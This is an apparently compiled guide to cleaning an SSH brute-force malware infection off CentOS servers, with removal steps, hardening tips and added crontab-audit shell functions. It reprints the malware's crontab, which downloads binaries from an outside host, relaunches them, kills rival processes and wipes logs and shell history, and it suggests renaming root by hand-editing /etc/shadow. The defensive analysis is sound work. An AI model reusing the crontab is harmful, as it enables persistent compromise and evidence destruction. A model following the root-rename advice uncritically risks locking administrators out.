Removing Linux BASH SHELLSHOCKER MALWARE

Unknown processes (dsfref, gfhddsfew, dsfref, etc.) start automatically on CentOS 6.5.

The malware is mainly present in /etc/init.d/. It runs automatically at system start, so remove its entry from /etc/init.d. These are the malware files and their locations:

/etc/dsfref
/etc/gfhddsfew
/etc/dsfref

To remove the virus from Linux

Note: I used chattr -i to change the permissions and deleted the file sfewfesfs; when I tried to delete the file without using chattr, it said the permissions can't be changed / the file can't be deleted. One more thing: when I ran #rm /etc/sfewfesfs without chattr, the computer restarted, and this happened every time I tried to delete the file without chattr. Also, these executables show up in the running processes only when the internet is connected.

Linux can get infected? Why did this wonderful thing have to happen to me of all people... well, it did, so no point being depressed, brother ~
The situation: access to the server was very slow, and every now and then it could not be reached at all. DNSPod emailed me every couple of days: “D Monitoring notice: Your website is inaccessible.”
The machine runs CentOS, port 22 is open with root login, and the password is 9 characters of random lowercase letters and digits.
I contacted the VPS provider immediately to ask about the situation; their feedback was that the machine had a virus and had been hacked.

chattr -i /etc/sfewfesfs*
rm -rf /etc/sfewfesfs*
chattr -i /etc/gfhjrtfyhuf*
rm -rf /etc/gfhjrtfyhuf*
chattr -i /etc/dsfrefr*
rm -rf /etc/dsfrefr*
chattr -i /etc/sdmfdsfhjfe*
rm -rf /etc/sdmfdsfhjfe*
chattr -i /etc/rewgtf3er4t*
rm -rf /etc/rewgtf3er4t*
chattr -i /etc/gfhddsfew*
rm -rf /etc/gfhddsfew*
chattr -i /etc/ferwfrre*
rm -rf /etc/ferwfrre*
Recently I received a call from one of my clients about the slowness (almost unresponsive) of their Linux server (running CentOS) and a rapid increase in its network traffic. Fortunately this is one of their lab servers, so they did not incur any production outage.

Here is the output of the top command on this server:

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1252 root 20 0 66.0g 2.9g 380 S 725.2 38.0 11935:13 .sshdd141199598
2025 root 20 0 423m 1760 0 S 3.2 0.0 0:39.98 gdmorpen
14295 root 20 0 107m 1180 964 R 0.5 0.0 0:00.03 ps
14297 root 20 0 107m 1180 964 R 0.5 0.0 0:00.03 ps
8316 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.86 .sshhdd14119186
8318 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.47 .sshhdd14119186
8319 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.27 .sshhdd14119186
8321 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.11 .sshhdd14119186
8338 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.67 .sshhdd14119186
8339 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.67 .sshhdd14119186
8341 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.86 .sshhdd14119186
8345 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.10 .sshhdd14119186
8360 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.59 .sshhdd14119186
8364 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.95 .sshhdd14119186
8371 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.94 .sshhdd14119186
8380 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.65 .sshhdd14119186


Here are the steps I followed to remove this malware; hopefully this helps others with a similar issue.

1. Disconnect the server from network.

2. Take the backup of root crontab and remove the root crontab. You can restore any relevant entries that you are aware of from the backup.

3. Remove the following files:
#rm /etc/gfhjrtfyhuf
#rm /etc/sfewfesfs
#rm /etc/gdmorpen
#rm /etc/fdsfsfvff
#rm /etc/rewgtf3er4t
#rm /etc/smarvtd
#rm /etc/whitptabil
#rm /etc/.SSH2

In case you are not able to delete any of the above files, you may have to clear the immutable attribute (chattr -i) before removing the file:
#chattr -i /etc/sfewfesfs
#rm /etc/sfewfesfs

4. Remove the following files from the /tmp directory:
#rm /tmp/gfhjrtfyhuf
#rm /tmp/sfewfesfs
#rm /tmp/gdmorpen
#rm /tmp/fdsfsfvff
#rm /tmp/rewgtf3er4t
#rm /tmp/smarvtd
#rm /tmp/whitptabil
#rm /tmp/.sshdd*

5. Remove the file S99local from the /etc/rc*.d directories:
#rm /etc/rc2.d/S99local
#rm /etc/rc3.d/S99local
#rm /etc/rc4.d/S99local

6. Disable remote root login:

Open the file /etc/ssh/sshd_config and set the following value to “no” (uncomment the line if it is commented out):
# Prevent root logins:
PermitRootLogin no

7. Reconnect/enable the network.

8. Update the system:
#yum update

9. Now check the running processes and make sure that no strange processes are running.

Logging into the server, I found the machine was constantly sending packets and the bandwidth was saturated (10 GB sent in 5 minutes). CPU usage was 100%; in top I could see the sfewfesfs process and a .sshddXXXXXXXXXX process (a string of random numbers). Under /etc there were files with strange names such as sfewfesfs and nhgbhhj, shown in red by ls.
Port 22 had to stay usable, and since the hosting provider could not help, the only option was to back up the data and reinstall! The cleanup method is published here, and a summary of how to respond to brute-force attacks follows.
If you are behind a NAT, change the external port that is mapped to 22 to some other port XXXX, and change the root password:

passwd
Disable root login over port 22 (SSH): in /etc/ssh/sshd_config, find the commented-out # PermitRootLogin line and change it to

PermitRootLogin no
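
Both this step and step 6 of the earlier procedure rely on the edit actually taking effect, and sshd uses the first uncommented PermitRootLogin value it reads, so a `PermitRootLogin no` appended below an existing `PermitRootLogin yes` changes nothing. The function below is an added example, not part of this post: it reads an sshd_config on stdin and reports the effective value, assuming the OpenSSH 5.x default of `yes` (as shipped with CentOS 6) when the directive is absent.

```shell
# Added example (not from the original post): report the PermitRootLogin value
# sshd would actually use. sshd takes the FIRST matching directive, so a
# "PermitRootLogin no" placed after an earlier "PermitRootLogin yes" is ignored.
# Directives inside a Match block are conditional, so scanning stops there.
# Usage: effective_permit_root_login [default] < /etc/ssh/sshd_config
effective_permit_root_login() {
    # Assumption: default "yes", as in OpenSSH 5.x on CentOS 6 (7.0+ differs).
    awk -v def="${1:-yes}" '
        { gsub(/=/, " ") }                       # accept "PermitRootLogin=no" form
        /^[ \t]*#/ || /^[ \t]*$/ { next }        # comments and blank lines
        tolower($1) == "match" { exit }          # stop at conditional blocks
        tolower($1) == "permitrootlogin" { print tolower($2); found = 1; exit }
        END { if (!found) print def }
    '
}

# Constructed sample: the common mistake of appending "no" below an existing "yes".
SAMPLE_SSHD_CONFIG='Port 22
PermitRootLogin yes
PermitRootLogin no'

printf '%s\n' "$SAMPLE_SSHD_CONFIG" | effective_permit_root_login   # prints: yes
```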
View the ports in use:

netstat -atunlp
Look for the sfewfesfs and .sshdd1401029348 packet-sending processes.
Find where the process binary lives:

ll /proc/<PID>
Delete the virus files:

chattr -i /etc/sfewfesfs*
rm -rf /etc/sfewfesfs*
Also delete any suspicious files such as the one named nhgbhhj:

rm -rf /etc/nhgbhhj
rm -rf /etc/nhgbhhj***
Delete the scheduled tasks (very important): this is how the virus resurrects itself!

rm -rf /var/spool/cron/root
rm -rf /var/spool/cron/root.1
Check for the hidden file .SSH2 with ls -al and delete it:

rm -rf /etc/.SSH2
Check for the hidden .sshdd1401029348 file with ls -al and delete it:

rm -rf /tmp/.sshdd140*
Restart the server and you are done.
Experts online stress this: with port 22 open and root login allowed, you are asking for trouble (no zuo no die). This was my first time experiencing a Linux infection; I had thought it was a very secure operating system -_-! It felt cool at first, and I got careless.
Cause of infection and a reminder

But a VPS tenant needs port 22 open, and needs the root account and its privileges! So what to do?
---- The following is the important point of this article ----
How does a seemingly secure system get broken into? Because port 22 is open with a simple root username + password, for example:
root123
Hackers brute-force it: they try “user name” + “password” combinations exhaustively over remote login. Since the default Linux administrator username is root, they only need to brute-force the password, and if you leave it like that you are asking for trouble ~~
Countermeasure

Is there another trick? Yes: change the root user name (there is no dedicated command for this; you can only edit the configuration files).
Log in as root and edit /etc/passwd and /etc/shadow with vi.
(If you are not sure what these two files do, read up on /etc/passwd and /etc/shadow first.)

vi /etc/passwd
Press i to enter insert mode, change the "root" at the start of the first line to the new user name, then press Esc to leave insert mode and type :x to save and exit.

vi /etc/shadow
Press i to enter insert mode, change the "root" at the start of the first line to the new user name, then press Esc to leave insert mode and type :x! to force save and exit.
NOTE: To keep sudo working you also need to update /etc/sudoers as follows (from "How to add Users to /etc/sudoers"):

vi /etc/sudoers
Find the line root ALL=(ALL) ALL
and add this line below it: newusername ALL=(ALL) ALL
Type :x! to force save and exit.
Reconnect with the new user name and the original root password. Done!
Attached: the virus's cron script

*/1 * * * * killall -9 .IptabLes
*/1 * * * * killall -9 nfsd4
*/1 * * * * killall -9 profild.key
*/1 * * * * killall -9 nfsd
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 sdmfdsfhjfe
*/98 * * * * killall -9 gfhjrtfyhuf
*/97 * * * * killall -9 sdmfdsfhjfe
*/96 * * * * killall -9 rewgtf3er4t
*/95 * * * * killall -9 ferwfrre
*/94 * * * * killall -9 dsfrefr
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhjrtfyhuf
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sfewfesfs
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sdmfdsfhjfe
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhddsfew
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/rewgtf3er4t
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ferwfrre
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/dsfrefr
*/120 * * * * cd /root;rm -rf dir nohup.out
*/360 * * * * cd /etc;rm -rf dir gfhjrtfyhuf
*/360 * * * * cd /etc;rm -rf dir dsfrefr
*/360 * * * * cd /etc;rm -rf dir sdmfdsfhjfe
*/360 * * * * cd /etc;rm -rf dir rewgtf3er4t
*/360 * * * * cd /etc;rm -rf dir gfhddsfew
*/360 * * * * cd /etc;rm -rf dir ferwfrre
*/1 * * * * cd /etc;rm -rf dir sfewfesfs.*
*/1 * * * * cd /etc;rm -rf dir gfhjrtfyhuf.*
*/1 * * * * cd /etc;rm -rf dir dsfrefr.*
*/1 * * * * cd /etc;rm -rf dir sdmfdsfhjfe.*
*/1 * * * * cd /etc;rm -rf dir rewgtf3er4t.*
*/1 * * * * cd /etc;rm -rf dir gfhddsfew.*
*/1 * * * * cd /etc;rm -rf dir ferwfrre.*
*/1 * * * * chmod 7777 /etc/gfhjrtfyhuf
*/1 * * * * chmod 7777 /etc/sfewfesfs
*/1 * * * * chmod 7777 /etc/dsfrefr
*/1 * * * * chmod 7777 /etc/sdmfdsfhjfe
*/1 * * * * chmod 7777 /etc/rewgtf3er4t
*/1 * * * * chmod 7777 /etc/gfhddsfew
*/1 * * * * chmod 7777 /etc/ferwfrre
*/99 * * * * nohup /etc/sfewfesfs > /dev/null 2>&1&
*/100 * * * * nohup /etc/sdmfdsfhjfe > /dev/null 2>&1&
*/99 * * * * nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
*/98 * * * * nohup /etc/sdmfdsfhjfe > /dev/null 2>&1&
*/97 * * * * nohup /etc/rewgtf3er4t > /dev/null 2>&1&
*/96 * * * * nohup /etc/ferwfrre > /dev/null 2>&1&
*/95 * * * * nohup /etc/dsfrefr > /dev/null 2>&1&
*/1 * * * * echo “unset MAILCHECK” >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c
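
Read line by line, every entry in the crontab above falls into a handful of patterns: re-fetching the binaries, making them executable, relaunching them, killing competing processes, and wiping history and logs. The shell function below is an added example, not something from the post: it reads a crontab on stdin and tags lines matching those patterns, so `crontab -l -u root | audit_crontab` gives a quick triage before step 2 (back up and remove the root crontab). The sample crontab in the block is constructed, with example.invalid standing in for the download host.

```shell
# Added example (not from the original post): tag root-crontab lines that match
# the persistence and anti-forensics patterns in the crontab quoted above.
# Reads crontab text on stdin; prints "<reason>: <line>" per suspicious line.
# Benign lines produce no output, so `... | wc -l` is a quick hit count.
audit_crontab() {
    while IFS= read -r line; do
        case "$line" in ''|'#'*) continue ;; esac   # skip blanks and comments
        reason=''
        case "$line" in
            *wget\ http*|*curl\ http*)     reason='re-downloads a payload' ;;
            *chmod\ 777*)                  reason='marks a file setuid/world-writable' ;;
            *nohup\ /etc/*|*nohup\ /tmp/*) reason='relaunches a binary from /etc or /tmp' ;;
            *killall\ -9*)                 reason='kills competing processes' ;;
            *'cd /var/log >'*|*'> /var/log/'*)
                # As written on the page, "cd /var/log > secure" truncates a file
                # named "secure" in cron's working directory, but the intent is clear.
                reason='truncates a log file' ;;
            *bash_history*|*history\ -[cr]*) reason='wipes shell history' ;;
            *MAILCHECK*)                   reason='disables login mail notices' ;;
        esac
        if [ -n "$reason" ]; then
            printf '%s: %s\n' "$reason" "$line"
        fi
    done
}

# Constructed sample: lines in the shape of the quoted crontab plus one
# legitimate logrotate entry; example.invalid stands in for the real host.
SAMPLE_CRONTAB='*/1 * * * * killall -9 nfsd
*/120 * * * * cd /etc; wget http://example.invalid:8080/gfhjrtfyhuf
*/1 * * * * chmod 7777 /etc/sfewfesfs
*/99 * * * * nohup /etc/sfewfesfs > /dev/null 2>&1&
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * cd /var/log > secure
*/1 * * * * echo "unset MAILCHECK" >> /etc/profile
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf'

printf '%s\n' "$SAMPLE_CRONTAB" | audit_crontab   # 7 tagged lines, logrotate not among them
```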
